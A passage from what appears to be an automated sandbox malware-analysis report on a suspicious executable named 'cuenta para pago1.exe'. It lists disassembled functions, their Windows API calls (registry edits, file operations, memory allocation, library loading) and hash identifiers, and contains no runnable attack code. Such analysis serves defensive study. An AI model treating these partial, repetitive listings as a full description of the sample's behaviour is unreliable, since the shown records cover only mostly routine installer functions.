                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree
                                                                                      • String ID: Call
                                                                                      • API String ID: 3394109436-1824292864
                                                                                      • Opcode ID: 1e4a5162af435751432e6e7f2dba97d226f4d9e1c95c10189c3a7610031c837c
                                                                                      • Instruction ID: 92ea0690437fa8f145506ea4d9625389eaa327d8cc6974590e314eb6964df5ff
                                                                                      • Opcode Fuzzy Hash: 1e4a5162af435751432e6e7f2dba97d226f4d9e1c95c10189c3a7610031c837c
                                                                                      • Instruction Fuzzy Hash: 9121A172600100EBDB20EF94CD8499AB3B9EB84328724403BF102F72D1DBBCA8119F6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqE113.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3677997916-0
                                                                                      • Opcode ID: c3f1b101d7ab7b4636fb7dca452c083d8e471adbd319c2c1a24730d374ee5e78
                                                                                      • Instruction ID: e4ac8c9376200f70c7981abe7f64d2c812767dcd2539a2364c5f8151efcc43ed
                                                                                      • Opcode Fuzzy Hash: c3f1b101d7ab7b4636fb7dca452c083d8e471adbd319c2c1a24730d374ee5e78
                                                                                      • Instruction Fuzzy Hash: 75117331915205EBDB14CFA4DA489BEB7B4FF44354F20843FE405B72D0D6B89A41EB5A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
                                                                                      • Instruction ID: 40f3ddd491d249f73d2fb4fc43cce1b0e50519406e0a546e2fe7b43c981aace9
                                                                                      • Opcode Fuzzy Hash: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
                                                                                      • Instruction Fuzzy Hash: 2801D131B24210ABE7295B389D05B2A3698E710314F10863EB911F62F1DA78DC138B4D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteOpenValue
                                                                                      • String ID:
                                                                                      • API String ID: 849931509-0
                                                                                      • Opcode ID: ec2e56ee61c9e08def1d50c1f8a6808fef06f3ab76a6156b5f6b2d5bdcf65ddb
                                                                                      • Instruction ID: 619afea56069f31c127a8e11fd0f1f435edbd74989573f139d652fd0604b037d
                                                                                      • Opcode Fuzzy Hash: ec2e56ee61c9e08def1d50c1f8a6808fef06f3ab76a6156b5f6b2d5bdcf65ddb
                                                                                      • Instruction Fuzzy Hash: 8AF0AF32A04100ABEB10BFB48A4EABE72699B80314F14843BF501B71D1C9FC9D025629
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040156B Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      • Opcode ID: 4b08649e2767e153eb05ad833bbe1713a4ba0a3d3c758775f708b13ea380d49e
                                                                                      • Instruction ID: 14d99bf0b22e04dc8d6d27e1a0bb6c10309fac34fbb9e600a12b00824ffe684e
                                                                                      • Opcode Fuzzy Hash: 4b08649e2767e153eb05ad833bbe1713a4ba0a3d3c758775f708b13ea380d49e
                                                                                      • Instruction Fuzzy Hash: 5EE04F32B001049BCB24CBA8ED808AE77A6AB88320750453FD902B36A0CA74DC51CF28
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004063F4 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                                        • Part of subcall function 00406384: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                                                        • Part of subcall function 00406384: wsprintfW.USER32 ref: 004063D6
                                                                                        • Part of subcall function 00406384: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004063EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2547128583-0
                                                                                      • Opcode ID: a18958032a131606469e198625683324ecaa140be52d037ed0b096a6b0eca255
                                                                                      • Instruction ID: 5dc38b7c1614d08ea85e9237aecc352f838a6b2874e2c17184f6d3a6923fef4e
                                                                                      • Opcode Fuzzy Hash: a18958032a131606469e198625683324ecaa140be52d037ed0b096a6b0eca255
                                                                                      • Instruction Fuzzy Hash: 02E086326081225BD31157715D4497776A8AA9D640306043EFD06F61C1D774AC219AAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000,?), ref: 00401DF2
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      • Opcode ID: 347994a47e66675a56206e59af71a82015a20bd66eb05692f0dc3c3b28152ec7
                                                                                      • Instruction ID: c65acc83bfa495384d8d8e75d5cf87c092469090b0d1be5324bf36691b182b4f
                                                                                      • Opcode Fuzzy Hash: 347994a47e66675a56206e59af71a82015a20bd66eb05692f0dc3c3b28152ec7
                                                                                      • Instruction Fuzzy Hash: C1E08C32A04100ABC720AFB5AA8999D3375EF90369B10057BE402F10E1C6BCAC409A2E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405BEF Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\cuenta para pago1.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405BF3
                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405C15
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                                                                      • Instruction ID: be88a92cb82447fd1599dbd49a9896cb6db060ceaa3ec03b2970cb079924df1d
                                                                                      • Opcode Fuzzy Hash: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                                                                      • Instruction Fuzzy Hash: FDD09E71658201AFEF098F20DE16F2E7AA2EB84B00F10562CB642940E0D6B15815DB16
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004056C5 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,0040325D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004056CB
                                                                                      • GetLastError.KERNEL32 ref: 004056D9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      • Opcode ID: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                                                      • Instruction ID: fb2ec3850198e6a3c32e9ec6a0d6f7e4a8645a4513041e6eac74538e2b64e397
                                                                                      • Opcode Fuzzy Hash: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                                                      • Instruction Fuzzy Hash: 51C04C30A18642DBD6505B20ED087177950AB50741F60CD35610BF11A0D6759811DD3E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100028A4 Relevance: 2.7, APIs: 2, Instructions: 156memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                      • GetLastError.KERNEL32 ref: 10002A6A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4068842862.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068909846.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068953066.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocErrorLastVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 497505419-0
                                                                                      • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                      • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                      • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                      • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401673 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 0040168E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileMove
                                                                                      • String ID:
                                                                                      • API String ID: 3562171763-0
                                                                                      • Opcode ID: 2709739294a990dc73731c5d5ee29084b050ed7b5d4126b103810d59a933f9e4
                                                                                      • Instruction ID: 1b5114671cd2f37f61593a5948342403c0197a7a9993dea188d241478f0c7c7c
                                                                                      • Opcode Fuzzy Hash: 2709739294a990dc73731c5d5ee29084b050ed7b5d4126b103810d59a933f9e4
                                                                                      • Instruction Fuzzy Hash: 16F0963160511097CB107B754E0DD5F31659B82328B24467BB911B21E5D9BC8A01956E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402786 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                        • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointerwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 327478801-0
                                                                                      • Opcode ID: 390f2af81ab463b3cbd4013dd9a57b5a130c00408a04b447ab1cf3b55cc0eeb8
                                                                                      • Instruction ID: 1be42fce3669e14aef02856632b8c3fd6eb27c701acbe6074d6f00ab1ddd0ca8
                                                                                      • Opcode Fuzzy Hash: 390f2af81ab463b3cbd4013dd9a57b5a130c00408a04b447ab1cf3b55cc0eeb8
                                                                                      • Instruction Fuzzy Hash: 30E04F71B05515EBDB11AFA59E4ADAF776AEB40329B14043BF101F00E1C67D8C419A3E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringWrite
                                                                                      • String ID:
                                                                                      • API String ID: 390214022-0
                                                                                      • Opcode ID: 981c7979ba822dccdb72df52fcfe6b7f87be0c37e1a4f4794e53a06bb608896e
